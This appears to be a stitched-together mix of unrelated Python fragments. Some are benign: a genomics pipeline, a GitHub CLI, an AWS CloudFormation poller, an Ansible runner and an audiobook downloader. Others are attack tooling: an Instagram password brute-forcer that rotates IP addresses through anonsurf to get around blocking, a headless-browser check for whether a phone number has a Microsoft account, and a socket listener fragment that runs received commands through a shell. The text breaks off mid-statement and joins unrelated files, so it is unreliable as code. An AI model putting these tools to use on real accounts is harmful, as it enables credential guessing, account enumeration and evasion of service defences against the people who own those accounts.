time.sleep(100) except (KeyboardInterrupt, SystemExit): self.handle_sys_exit()
" " * 31) + "#" + colored.yellow( " |_| |_____)____/ ") + " #" print colored.yellow("<-->" + " " * 51) + "#" + " " * 21 + "#" + "\n" + "=" * 79 print "# || " + " address " + " " * 10 + "|| cType " + " " * 12 + "|| stat " print "-" * 79 if newStart == True: return bindsocket else: pass try: bindsocket = Welcome(True) except socket.error, (value, message): print colored.red("Could not open socket: " + message + "!!") sys.exit(1) def RecvData(connstream): temp = connstream.read() outData = "" while temp != "CEND": outData += temp temp = connstream.read() return outData def ExecIN(cmd): p = Popen(cmd, shell=True,
def run(parser, args): log = "%s.minion.log.txt" % (args.sample) logfh = open(log, 'w') if args.scheme.find('/') != -1: scheme_name, scheme_version = args.scheme.split('/') else: scheme_name = args.scheme scheme_version = "V1" ref = "%s/%s/%s/%s.reference.fasta" % (args.scheme_directory, scheme_name, scheme_version, scheme_name) bed = "%s/%s/%s/%s.scheme.bed" % (args.scheme_directory, scheme_name, scheme_version, scheme_name) if args.read_file: read_file = args.read_file else: read_file = "%s.fasta" % (args.sample) if not os.path.exists(ref): print(colored.red('Scheme reference file not found: ') + ref) raise SystemExit(1) if not os.path.exists(bed): print(colored.red('Scheme BED file not found: ') + bed) raise SystemExit(1) pools = set([row['PoolName'] for row in read_bed_file(bed)]) cmds = [] nanopolish_header = get_nanopolish_header(ref) if not args.medaka and not args.skip_nanopolish: if not args.fast5_directory or not args.sequencing_summary: print( colored.red( 'Must specify FAST5 directory and sequencing summary for nanopolish mode.' )) raise SystemExit(1) cmds.append("nanopolish index -s %s -d %s %s" % ( args.sequencing_summary, args.fast5_directory, args.read_file, )) # 3) index the ref & align with bwa" if not args.bwa: cmds.append( "minimap2 -a -x map-ont -t %s %s %s | samtools view -bS -F 4 - | samtools sort -o %s.sorted.bam -" % (args.threads, ref, read_file, args.sample)) else: cmds.append("bwa index %s" % (ref, )) cmds.append( "bwa mem -t %s -x ont2d %s %s | samtools view -bS -F 4 - | samtools sort -o %s.sorted.bam -" % (args.threads, ref, read_file, args.sample)) cmds.append("samtools index %s.sorted.bam" % (args.sample, )) # 4) trim the alignments to the primer start sites and normalise the coverage to save time if args.normalise: normalise_string = '--normalise %d' % (args.normalise) else: normalise_string = '' # if args.medaka: # cmds.append("align_trim --no-read-groups --start %s %s --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.trimmed.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) # cmds.append("align_trim %s %s --no-read-groups --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.primertrimmed.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) # cmds.append("samtools index %s.trimmed.sorted.bam" % (args.sample)) # cmds.append("samtools index %s.primertrimmed.sorted.bam" % (args.sample)) # else: cmds.append( "align_trim --start %s %s --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.trimmed.rg.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) cmds.append( "align_trim %s %s --remove-incorrect-pairs --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.primertrimmed.rg.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) cmds.append("samtools index %s.trimmed.rg.sorted.bam" % (args.sample)) cmds.append("samtools index %s.primertrimmed.rg.sorted.bam" % (args.sample)) if args.medaka: for p in pools: cmds.append( "samtools view -b -r \"%s\" %s.primertrimmed.rg.sorted.bam > %s.primertrimmed.%s.sorted.bam" % (p, args.sample, args.sample, p)) cmds.append("samtools index %s.primertrimmed.%s.sorted.bam" % (args.sample, p)) # 6) do variant calling using the raw signal alignment if args.medaka: 
for p in pools: if os.path.exists("%s.%s.hdf" % (args.sample, p)): os.remove("%s.%s.hdf" % (args.sample, p)) cmds.append( "medaka consensus --chunk_len 800 --chunk_ovlp 400 %s.primertrimmed.%s.sorted.bam %s.%s.hdf" % (args.sample, p, args.sample, p)) if args.no_indels: cmds.append("medaka snp %s %s.%s.hdf %s.%s.vcf" % (ref, args.sample, p, args.sample, p)) else: cmds.append("medaka variant %s %s.%s.hdf %s.%s.vcf" % (ref, args.sample, p, args.sample, p)) else: if not args.skip_nanopolish: indexed_nanopolish_file = read_file if args.no_indels: nanopolish_extra_args = " --snps" else: nanopolish_extra_args = "" for p in pools: cmds.append( "nanopolish variants --min-flanking-sequence 10 -x %s --progress -t %s --reads %s -o %s.%s.vcf -b %s.trimmed.rg.sorted.bam -g %s -w \"%s\" --ploidy 1 -m 0.15 --read-group %s %s" % (args.max_haplotypes, args.threads, indexed_nanopolish_file, args.sample, p, args.sample, ref, nanopolish_header, p, nanopolish_extra_args)) merge_vcf_cmd = "artic_vcf_merge %s %s" % (args.sample, bed) for p in pools: merge_vcf_cmd += " %s:%s.%s.vcf" % (p, args.sample, p) cmds.append(merge_vcf_cmd) if args.medaka: cmds.append("bgzip -f %s.merged.vcf" % (args.sample)) cmds.append("tabix -p vcf %s.merged.vcf.gz" % (args.sample)) cmds.append( "longshot -P 0 -F -A --no_haps --bam %s.primertrimmed.rg.sorted.bam --ref %s --out %s.longshot.vcf --potential_variants %s.merged.vcf.gz" % (args.sample, ref, args.sample, args.sample)) cmds.append( "artic_vcf_filter --longshot %s.longshot.vcf %s.pass.vcf %s.fail.vcf" % (args.sample, args.sample, args.sample)) else: cmds.append( "artic_vcf_filter --nanopolish %s.merged.vcf %s.pass.vcf %s.fail.vcf" % (args.sample, args.sample, args.sample)) cmds.append( "artic_make_depth_mask --store-rg-depths %s %s.primertrimmed.rg.sorted.bam %s.coverage_mask.txt" % (ref, args.sample, args.sample)) cmds.append( "artic_plot_amplicon_depth --primerScheme %s --sampleID %s --outFilePrefix %s %s*.depths" % (bed, args.sample, args.sample, args.sample)) vcf_file = "%s.pass.vcf" % (args.sample, ) cmds.append("bgzip -f %s" % (vcf_file)) cmds.append("tabix -p vcf %s.gz" % (vcf_file)) # artic_mask must be run before bcftools consensus cmds.append( "artic_mask %s %s.coverage_mask.txt %s.fail.vcf %s.preconsensus.fasta" % (ref, args.sample, args.sample, args.sample)) cmds.append( "bcftools consensus -f %s.preconsensus.fasta %s.gz -m %s.coverage_mask.txt -o %s.consensus.fasta" % (args.sample, vcf_file, args.sample, args.sample)) if args.medaka: method = 'medaka' else: method = 'nanopolish' fasta_header = "%s/ARTIC/%s" % (args.sample, method) cmds.append("artic_fasta_header %s.consensus.fasta \"%s\"" % (args.sample, fasta_header)) cmds.append("cat %s.consensus.fasta %s > %s.muscle.in.fasta" % (args.sample, ref, args.sample)) cmds.append("muscle -in %s.muscle.in.fasta -out %s.muscle.out.fasta" % (args.sample, args.sample)) for cmd in cmds: print(colored.green("Running: ") + cmd, file=sys.stderr) if not args.dry_run: timerStart = time.perf_counter() retval = os.system(cmd) if retval != 0: print(colored.red('Command failed:') + cmd, file=sys.stderr) raise SystemExit(20) timerStop = time.perf_counter() # print the executed command and the runtime to the log file print("{}\t{}".format(cmd, timerStop - timerStart), file=logfh) # if it's a dry run, print just the command else: print(cmd, file=logfh) logfh.close()
def begin(): if os.path.exists(CONFIG_FILE): pass else: # create config file create_config() # commit changes commit_changes() if args.flags.contains(('--version', '-v')): puts(version()) sys.exit(0) elif args.get(0) == None: get_help() elif args.flags.contains(('--help', '-h')) or args.get(0) == 'help': get_help() sys.exit(0) elif args.get(0) == 'create': if args.get(1) == None: puts('{0}. {1}'.format( colored.blue('octogit'), colored.red( 'You need to pass both a project name and description'))) else: project_name = args.get(1) description = args.get(2) or '' organization = args.get(3) create_repository(project_name, description, organization=organization) sys.exit() elif args.flags.contains(('--issues', '-i')) or args.get(0) == 'issues': url = find_github_remote() username, url = get_username_and_repo(url) if args.get(1) == 'create': if args.get(2) == None: puts('{0}. {1}'.format( colored.blue('octogit'), colored.red('You need to pass an issue title'))) sys.exit(-1) else: issue_name = args.get(2) description = args.get(3) create_issue(username, url, issue_name, description) sys.exit(0) issue_number = None try: issue_number = args.get(1) except: pass if issue_number is not None: if args.get(2) == 'close': close_issue(username, url, issue_number) sys.exit(0) elif args.get(2) == 'view': view_issue(username, url, issue_number) sys.exit(0) elif args.get(1) == '--assigned': get_issues(username, url, args.flags.contains(('--assigned', '-a'))) sys.exit(0) else: get_single_issue(username, url, issue_number) sys.exit(0) else: get_issues(username, url, False) sys.exit(0) elif args.flags.contains(('--login', '-l')) or args.get(0) == 'login': if args.get(1) == None or args.get(2) == None: puts('{0}. {1}'.format( colored.blue('octogit'), colored.red('You need both a password and username to login'))) else: username = args.get(1) password = args.get(2) login(username, password) else: get_help() sys.exit(0)
def err(text):
    puts(colored.red('✘ {0}'.format(text)), stream=sys.stderr.write)
def get_crypto_qty(max_num, input_type, user_prompt=DEFAULT_PROMPT, default_input=None, show_default=False, quit_ok=False): assert input_type in UNIT_CHOICES, input_type if default_input and show_default: prompt_to_use = '%s [%s]: ' % (user_prompt, default_input) else: prompt_to_use = '%s: ' % user_prompt user_input = raw_input(prompt_to_use).strip().strip('"') if default_input and not user_input: return int(default_input) if quit_ok and user_input in ['q', 'Q', 'b', 'B']: return False try: user_input_cleaned = user_input.replace(',', '') if user_input_cleaned == '-1': # for sweeping return -1 user_float = float(user_input_cleaned) except ValueError: if not user_input_cleaned: puts(colored.red('No entry. Please enter something.')) else: puts( colored.red('%s is not an integer. Please try again.' % user_input)) return get_crypto_qty( max_num=max_num, input_type=input_type, user_prompt=user_prompt, default_input=default_input, show_default=show_default, quit_ok=quit_ok, ) if user_float <= 0: puts( colored.red('%s <= 0. Please try again.' % (format_output(user_float, output_type=input_type), ))) return get_crypto_qty( max_num=max_num, input_type=input_type, user_prompt=user_prompt, default_input=default_input, show_default=show_default, quit_ok=quit_ok, ) if max_num is not None and user_float > max_num: puts( colored.red('%s > %s. Please try again.' % ( format_output(user_float, output_type=input_type), format_output(max_num, output_type=input_type), ))) return get_crypto_qty( max_num=max_num, input_type=input_type, user_prompt=user_prompt, default_input=default_input, show_default=show_default, quit_ok=quit_ok, ) return user_float
def microsoft(phone_number): global name global microsoft_load_balancer microsoft_load_balancer = True options = webdriver.ChromeOptions() options.add_argument('--headless') options.add_argument('--no-sandbox') options.add_argument('disable-infobars') options.add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'}) options.add_argument("--lang=en") prefs = { "translate_whitelists": { "ru": "en" }, "translate": { "enabled": "true" } } options.add_experimental_option("prefs", prefs) options.add_argument( "user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" ) loc = os.getcwd() driver = uc.Chrome(options=options) driver.get("https://login.live.com/") try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, '/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div/div/div[2]/div[2]/div/input[1]' ))).send_keys(phone_number) WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div/div/div[4]/div/div/div/div/input" ))).click() #/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[2]/div/div[2]/input WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[2]/div/div[2]/input" ))).send_keys("QWKEQĞPWEQWE") WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[3]/div[2]/div/div/div/div/input" ))).click() name = WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div/form[1]/div/div/div[1]/div[2]/div[2]/div/div[2]/div/div[2]/div/div[1]/div" ))).text name = "This Phone Number Is Connected To A Micr0s0ft Account!" print(colored.green("[+]") + colored.blue(name)) except: name = "This Phone Number Is Not Connected To Any Micr0s0ft Account!" print(colored.magenta("[-]") + colored.red(name)) microsoft_load_balancer = False driver.close()
def _poll_stack_events(awsclient, stack_name, last_event=None):
    # http://stackoverflow.com/questions/796008/cant-subtract-offset-naive-and-offset-aware-datetimes/25662061#25662061
    finished_statuses = ['CREATE_COMPLETE', 'CREATE_FAILED',
                         'DELETE_COMPLETE', 'DELETE_FAILED',
                         'ROLLBACK_COMPLETE', 'ROLLBACK_FAILED',
                         'UPDATE_COMPLETE', 'UPDATE_ROLLBACK_COMPLETE',
                         'UPDATE_ROLLBACK_FAILED']
    failed_statuses = ['CREATE_FAILED', 'DELETE_FAILED',
                       'ROLLBACK_COMPLETE', 'ROLLBACK_FAILED',
                       'UPDATE_ROLLBACK_COMPLETE', 'UPDATE_ROLLBACK_FAILED']
    warning_statuses = ['ROLLBACK_IN_PROGRESS',
                        'UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS',
                        'UPDATE_ROLLBACK_IN_PROGRESS']
    success_statuses = ['CREATE_COMPLETE', 'DELETE_COMPLETE', 'UPDATE_COMPLETE']
    seen_events = []
    # print len(seen_events)
    client = awsclient.get_client('cloudformation')
    status = ''
    # for the delete command we need the stack_id
    stack_id = get_stack_id(awsclient, stack_name)
    print('%-50s %-25s %-50s %-25s\n' % ('Resource Status', 'Resource ID',
                                         'Reason', 'Timestamp'))
    while status not in finished_statuses:
        response = client.describe_stack_events(StackName=stack_id)
        for event in response['StackEvents'][::-1]:
            if event['EventId'] not in seen_events and \
                    (not last_event or event['Timestamp'] > last_event):
                seen_events.append(event['EventId'])
                resource_status = event['ResourceStatus']
                resource_id = event['LogicalResourceId']
                # this is not always present
                try:
                    reason = event['ResourceStatusReason']
                except KeyError:
                    reason = ''
                timestamp = str(event['Timestamp'])
                message = '%-50s %-25s %-50s %-25s\n' % (
                    resource_status, resource_id, reason, timestamp)
                if resource_status in failed_statuses:
                    print(colored.red(message))
                elif resource_status in warning_statuses:
                    print(colored.yellow(message))
                elif resource_status in success_statuses:
                    print(colored.green(message))
                else:
                    print(message)
                if event['LogicalResourceId'] == stack_name:
                    status = event['ResourceStatus']
        time.sleep(5)
    exit_code = 0
    if status not in success_statuses:
        exit_code = 1
    return exit_code
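# Hypothetical call site for the poller above -- the awsclient wrapper instance and
# the stack name are assumptions, not taken from this file. It simply polls until
# the stack reaches a terminal status and propagates the exit code:
#
#     exit_code = _poll_stack_events(awsclient, 'my-stack')
#     sys.exit(exit_code)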
def abort(message):
    puts(colored.red(message))
def route(self, action, name, flags):
    if action not in self.valid_actions:
        puts(colored.red('%s is not a valid action' % action))
        exit()
    getattr(self, action)(name)
def sc_brute(username, password_wordlist): ip_changer() ip_adr = subprocess.check_output(["curl", "icanhazip.com", "-s"]) ip_adr = ip_adr.decode() print(colored.red("-") * 50) print( colored.red("[") + colored.green("+") + colored.red("]") + colored.green("Your Ip Address Has Been Changed To:") + colored.blue(str(ip_adr))) print( colored.red("[") + colored.magenta("!") + colored.red("]") + colored.yellow( "Speed Of The Attack Depends On The Proxy Server.It Could Be Fast Or Slow." )) print(colored.red("-") * 50) start_insta(username) x = 0 while (x <= len(password_wordlist)): try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys( Keys.CONTROL, "a", Keys.DELETE) WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys(password_wordlist[x]) time.sleep(1) time.sleep(1) with open("Passwords/entered_passwords.txt", "a+") as fi: fi.write("\n" + password_wordlist[x]) except: continue try: captcha = WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, '/html/body/div[1]/section/main/article/div[2]/div[1]/div/form/div[7]/p' ))).text if "your password was incorrect." in captcha: print( colored.red("[-]Password Is Not:") + colored.magenta(password_wordlist[x])) elif "a problem" in captcha or "couldn't connect to Instagram" in captcha: if x > 0: x = x - 1 print( colored.red("[") + colored.green("+") + colored.red("]") + "Changing Your Ip Address For Security Purposes Please Wait." ) os.system("xterm -e anonsurf restart") ip_adr = subprocess.check_output( ["curl", "icanhazip.com", "-s"]) ip_adr = ip_adr.decode() print(colored.red("-") * 50) print( colored.red("[") + colored.green("+") + colored.red("]") + colored.green("Your Ip Address Has Been Changed To:") + colored.blue(str(ip_adr))) print( colored.red("[") + colored.magenta("!") + colored.red("]") + colored.yellow( "Speed Of The Attack Depends On The Proxy Server.It Could Be Fast Or Slow." )) print(colored.red("-") * 50) start_insta(username) WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys( Keys.CONTROL, "a", Keys.DELETE) WebDriverWait(driver, 10).until( EC.element_to_be_clickable( (By.XPATH, '//*[@id="password"]'))).send_keys( password_wordlist[x]) time.sleep(3) time.sleep(1) with open("Passwords/entered_passwords.txt", "a+") as fi: fi.write("\n" + password_wordlist[x]) else: print( colored.green("[+]Password FOUND!! -->") + colored.blue(password_wordlist[x])) except: try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div[3]/section/nav/div[2]/div/div/div[2]/div/div" ))).click() print( colored.green("[+]Password FOUND!! -->") + colored.blue(password_wordlist[x])) break exit() except: try: #/html/body/div[1]/section/main/div/article/div/div[3]/div/a[1] WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div[1]/section/main/div/article/div/div[3]/div/a[1]" ))).click() print( colored.green("[+]Password FOUND!! -->") + colored.blue(password_wordlist[x])) break exit() except: #/html/body/div[1]/section/nav/div[2]/div/div/div[1]/a/div/div/img try: WebDriverWait(driver, 10).until( EC.element_to_be_clickable(( By.XPATH, "/html/body/div[1]/section/nav/div[2]/div/div/div[1]/a/div/div/img" ))).click() print( colored.green("[+]Password FOUND!! 
-->") + colored.blue(password_wordlist[x])) break exit() except: pass x += 1 for j in password_wordlist: with open("Passwords/entered_passwords.txt", "r") as fenerbahce: same = fenerbahce.readlines() if not j in same: with open("Passwords/not_entered_passwords.txt", "a+") as file: file.write(j)
from clint.textui import colored
import os

print
print
print colored.red(" --- Enter your Twilio information below to complete install --- ")
print
print

account_sid = raw_input('Twilio Account Sid: ')
auth_token = raw_input('Twilio Auth Token: ')

config = """\n\n# Configuration Auto-generated during installation
SECRET_KEY = {}
TWILIO_ACCOUNT_SID = '{}'
TWILIO_AUTH_TOKEN = '{}'""".format(repr(os.urandom(20)), account_sid, auth_token)

f = open('rapid_response_kit/utils/config.py', 'r')
contents = f.read()
f.close()

f = open('rapid_response_kit/utils/config.py', 'w')
f.write(contents + config)
f.close()

print
print
print colored.red(" --- Would you like to add other credentials now? ---")
print
print

decision = raw_input("Type 'yes' or 'no': ")
import os
import sys
import time
import optparse
import subprocess
from threading import Thread

from bs4 import BeautifulSoup
from clint.textui import colored

a = subprocess.check_output(["id"])
if not "root" in a.decode():
    print(
        colored.red(
            "[-]This Feature Requires Root Permission. Please Be Sure That You Are Root!"
        ))
    exit()


def ip_changer():
    print(
        colored.red("[") + colored.green("+") + colored.red("]") +
        "Changing Your Ip Address For Security Purposes Please Wait.")
    os.system("xterm -e anonsurf start")


def ip_stop():
    os.system("xterm -e anonsurf stop")
os.mkdir(rantempdir)
log.wac("CREATED " + rantempdir)

count = 0
for root, dirs, files in os.walk(root, topdown=False):
    if "clusters" not in root:
        log.whac(root)
        if len(dirs) == 1:
            print(colored.yellow("CLUSTERING SINGLE"), root,
                  colored.yellow(emoticons.get_ran_emot("meh")))
            log.wac("CLUSTERING SINGLE " + root)
            tablename = [x for x in files if ".table" in x][0]
            cmd = py + " " + DI + "cluster_single.py " + root + " " + logfile
            os.system(cmd)
        else:
            print(colored.blue("CLUSTERING INTERNAL"), root,
                  colored.blue(emoticons.get_ran_emot("meh")))
            log.wac("CLUSTERING INTERNAL " + root)
            tablename = [x for x in files if ".table" in x][0]
            if root[-1] != "/":
                root = root + "/"
            cmd = (py + " " + DI + "cluster_internal.py " + root + " " + root +
                   tablename + " " + logfile + " " + rantempdir)
            rc = subprocess.call(cmd, shell=True)
            if rc != 0:
                print(colored.red("PROBLEM WITH CLUSTERING INTERNAL"),
                      colored.red(emoticons.get_ran_emot("sad")))
                sys.exit(1)

cmd = py + " " + DI + "annotate_clusters.py " + sys.argv[1]
os.system(cmd)

cmd = py + " " + DI + "post_process_cluster_info.py " + sys.argv[1]
os.system(cmd)
def run(self, args, unknown_args): environment = get_environment(args.environment) ansible_context = AnsibleContext(args) public_vars = environment.public_vars def _run_ansible(args, *unknown_args): cmd_parts = ( 'ANSIBLE_CONFIG={}'.format( os.path.join(ANSIBLE_DIR, 'ansible.cfg')), 'ansible', args.inventory_group, '-m', args.module, '-i', environment.paths.inventory_ini, '-u', args.remote_user, '-a', args.module_args, '--diff', ) + tuple(unknown_args) become = args.become or bool(args.become_user) become_user = args.become_user include_vars = False if become: cmd_parts += ('--become', ) if become_user not in ('cchq', ): # ansible user can do things as cchq without a password, # but needs the ansible user password in order to do things as other users. # In that case, we need to pull in the vault variable containing this password include_vars = True if become_user: cmd_parts += ('--become-user', args.become_user) if include_vars: cmd_parts += ( '-e', '@{}'.format(environment.paths.vault_yml), '-e', '@{}'.format(environment.paths.public_yml), ) ask_vault_pass = include_vars and public_vars.get( 'commcare_cloud_use_vault', True) if ask_vault_pass: cmd_parts += ('--vault-password-file=/bin/cat', ) cmd_parts += get_common_ssh_args(public_vars) cmd = ' '.join(shlex_quote(arg) for arg in cmd_parts) print_command(cmd) p = subprocess.Popen(cmd, stdin=subprocess.PIPE, shell=True, env=ansible_context.env_vars) if ask_vault_pass: p.communicate(input='{}\n'.format( ansible_context.get_ansible_vault_password())) else: p.communicate() return p.returncode def run_check(): return _run_ansible(args, '--check', *unknown_args) def run_apply(): return _run_ansible(args, *unknown_args) exit_code = 0 if args.skip_check: user_wants_to_apply = ask( 'Do you want to apply without running the check first?', quiet=args.quiet) else: exit_code = run_check() if exit_code == 1: # this means there was an error before ansible was able to start running exit(exit_code) return # for IDE elif exit_code == 0: puts( colored.green( u"✓ Check completed with status code {}".format( exit_code))) user_wants_to_apply = ask( 'Do you want to apply these changes?', quiet=args.quiet) else: puts( colored.red(u"✗ Check failed with status code {}".format( exit_code))) user_wants_to_apply = ask( 'Do you want to try to apply these changes anyway?', quiet=args.quiet) if user_wants_to_apply: exit_code = run_apply() if exit_code == 0: puts( colored.green( u"✓ Apply completed with status code {}".format( exit_code))) else: puts( colored.red(u"✗ Apply failed with status code {}".format( exit_code))) exit(exit_code)
def ip_changer():
    print(
        colored.red("[") + colored.green("+") + colored.red("]") +
        "Changing Your Ip Address For Security Purposes Please Wait.")
    os.system("xterm -e anonsurf start")
def run():
    parser = argparse.ArgumentParser(
        prog='odmpy',
        description='Download/return an Overdrive loan audiobook',
        epilog='Version {}. Source at https://github.com/ping/odmpy/'.format(
            __version__))
    parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
                        help='Enable more verbose messages for debugging')
    subparsers = parser.add_subparsers(
        title='Available commands', dest='subparser_name',
        help='To get more help, use the -h option with the command.')
    parser_info = subparsers.add_parser(
        'info', description='Get information about a loan file.',
        help='Get information about a loan file')
    parser_info.add_argument('odm_file', type=str, help='ODM file path')
    parser_dl = subparsers.add_parser('dl',
                                      description='Download from a loan file.',
                                      help='Download from a loan file')
    parser_dl.add_argument('-d', '--downloaddir', dest='download_dir',
                           default='.', help='Download folder path')
    parser_dl.add_argument('-c', '--chapters', dest='add_chapters',
                           action='store_true',
                           help='Add chapter marks (experimental)')
    parser_dl.add_argument(
        '-m', '--merge', dest='merge_output', action='store_true',
        help='Merge into 1 file (experimental, requires ffmpeg)')
    parser_dl.add_argument(
        '-k', '--keepcover', dest='always_keep_cover', action='store_true',
        help='Always generate the cover image file (cover.jpg)')
    parser_dl.add_argument('odm_file', type=str, help='ODM file path')
    parser_ret = subparsers.add_parser('ret',
                                       description='Return a loan file.',
                                       help='Return a loan file.')
    parser_ret.add_argument('odm_file', type=str, help='ODM file path')

    args = parser.parse_args()
    if args.verbose:
        logger.setLevel(logging.DEBUG)

    xml_doc = xml.etree.ElementTree.parse(args.odm_file)
    root = xml_doc.getroot()

    # 'ret' command: return the loan early and exit
    if args.subparser_name == 'ret':
        logger.info('Returning {} ...'.format(args.odm_file))
        early_return_url = root.find('EarlyReturnURL').text
        try:
            early_return_res = requests.get(early_return_url,
                                            headers={'User-Agent': UA_LONG},
                                            timeout=10)
            early_return_res.raise_for_status()
            logger.info('Loan returned successfully: {}'.format(args.odm_file))
        except HTTPError as he:
            if he.response.status_code == 403:
                logger.warning('Loan is probably already returned.')
                sys.exit()
            logger.error(
                'Unexpected HTTPError while trying to return loan {}'.format(
                    args.odm_file))
            logger.error('HTTPError: {}'.format(str(he)))
            logger.debug(he.response.content)
            sys.exit(1)
        except ConnectionError as ce:
            logger.error('ConnectionError: {}'.format(str(ce)))
            sys.exit(1)
        sys.exit()

    # Extract the embedded Metadata document from the ODM file
    metadata = None
    for t in root.itertext():
        if not t.startswith('<Metadata>'):
            continue
        metadata = xml.etree.ElementTree.fromstring(
            # remove invalid & char
            re.sub(r'\s&\s', ' & ', t))
        break

    title = metadata.find('Title').text
    cover_url = metadata.find('CoverUrl').text
    authors = [
        c.text for c in metadata.find('Creators')
        if 'Author' in c.attrib.get('role', '')
    ]
    if not authors:
        authors = [c.text for c in metadata.find('Creators')]
    publisher = metadata.find('Publisher').text
    description = metadata.find('Description').text if metadata.find(
        'Description') is not None else ''

    # 'info' command: print loan details and exit
    if args.subparser_name == 'info':
        logger.info(u'{:10} {}'.format('Title:', colored.blue(title)))
        logger.info(u'{:10} {}'.format(
            'Creators:',
            colored.blue(u', '.join([
                u'{} ({})'.format(c.text, c.attrib['role'])
                for c in metadata.find('Creators')
            ]))))
        logger.info(u'{:10} {}'.format('Publisher:',
                                       metadata.find('Publisher').text))
        logger.info(u'{:10} {}'.format(
            'Subjects:',
            u', '.join([c.text for c in metadata.find('Subjects')])))
        logger.info(u'{:10} {}'.format(
            'Languages:',
            u', '.join([c.text for c in metadata.find('Languages')])))
        logger.info(u'{:10} \n{}'.format('Description:',
                                         metadata.find('Description').text))
        for formats in root.findall('Formats'):
            for f in formats:
                logger.info(u'\n{:10} {}'.format('Format:', f.attrib['name']))
                parts = f.find('Parts')
                for p in parts:
                    logger.info('* {} - {} ({:,.0f}kB)'.format(
                        p.attrib['name'], p.attrib['duration'],
                        math.ceil(1.0 * int(p.attrib['filesize']) / 1024)))
        sys.exit()

    # 'dl' command: collect download URLs and part listing
    download_baseurl = ''
    download_parts = []
    for formats in root.findall('Formats'):
        for f in formats:
            protocols = f.find('Protocols')
            for p in protocols:
                if p.attrib.get('method', '') != 'download':
                    continue
                download_baseurl = p.attrib['baseurl']
                break
            parts = f.find('Parts')
            for p in parts:
                download_parts.append(p.attrib)

    logger.info('Downloading "{}" by "{}" in {} parts...'.format(
        colored.blue(title, bold=True), colored.blue(', '.join(authors)),
        len(download_parts)))

    book_folder = os.path.join(args.download_dir,
                               u'{} - {}'.format(title, u', '.join(authors)))
    if not os.path.exists(book_folder):
        os.makedirs(book_folder)

    cover_filename = os.path.join(book_folder, 'cover.jpg')
    if not os.path.isfile(cover_filename):
        cover_res = requests.get(cover_url, headers={'User-Agent': UA})
        cover_res.raise_for_status()
        with open(cover_filename, 'wb') as outfile:
            outfile.write(cover_res.content)

    acquisition_url = root.find('License').find('AcquisitionUrl').text
    media_id = root.attrib['id']
    client_id = str(uuid.uuid1()).upper()
    raw_hash = '{client_id}|{omc}|{os}|ELOSNOC*AIDEM*EVIRDREVO'.format(
        client_id=client_id, omc=OMC, os=OS)
    m = hashlib.sha1(raw_hash.encode('utf-16-le'))
    license_hash = base64.b64encode(m.digest())

    # Extract license
    # License file is downloadable only once per odm
    # so we keep it in case downloads fail
    _, odm_filename = os.path.split(args.odm_file)
    license_file = os.path.join(args.download_dir,
                                odm_filename.replace('.odm', '.license'))

    if os.path.isfile(license_file):
        logger.warning(
            'Already downloaded license file: {}'.format(license_file))
    else:
        # download license file
        params = OrderedDict([('MediaID', media_id), ('ClientID', client_id),
                              ('OMC', OMC), ('OS', OS),
                              ('Hash', license_hash)])
        license_res = requests.get(acquisition_url, params=params,
                                   headers={'User-Agent': UA}, timeout=10,
                                   stream=True)
        try:
            license_res.raise_for_status()
            with open(license_file, 'wb') as outfile:
                for chunk in license_res.iter_content(1024):
                    outfile.write(chunk)
            logger.debug('Saved license file {}'.format(license_file))
        except HTTPError as he:
            if he.response.status_code == 404:
                # odm file has expired
                logger.error('The loan file "{}" has expired. '
                             'Please download again.'.format(args.odm_file))
            else:
                logger.error(he.response.content)
            sys.exit(1)
        except ConnectionError as ce:
            logger.error('ConnectionError: {}'.format(str(ce)))
            sys.exit(1)

    license_xml_doc = xml.etree.ElementTree.parse(license_file)
    license_root = license_xml_doc.getroot()
    ns = '{http://license.overdrive.com/2008/03/License.xsd}'
    license_client = license_root.find('{}SignedInfo'.format(ns)).find(
        '{}ClientID'.format(ns))
    license_client_id = license_client.text

    lic_file_contents = ''
    with open(license_file, 'r') as lic_file:
        lic_file_contents = lic_file.read()

    cover_bytes = None
    with open(cover_filename, 'rb') as f:
        cover_bytes = f.read()

    # Download each part, tag it, and collect chapter markers
    track_count = 0
    file_tracks = []
    keep_cover = args.always_keep_cover
    audio_lengths_ms = []
    for p in download_parts:
        part_number = int(p['number'])
        part_filename = os.path.join(
            book_folder,
            u'{}.mp3'.format(
                slugify(u'{} - Part {:02d}'.format(title, part_number),
                        allow_unicode=True)))
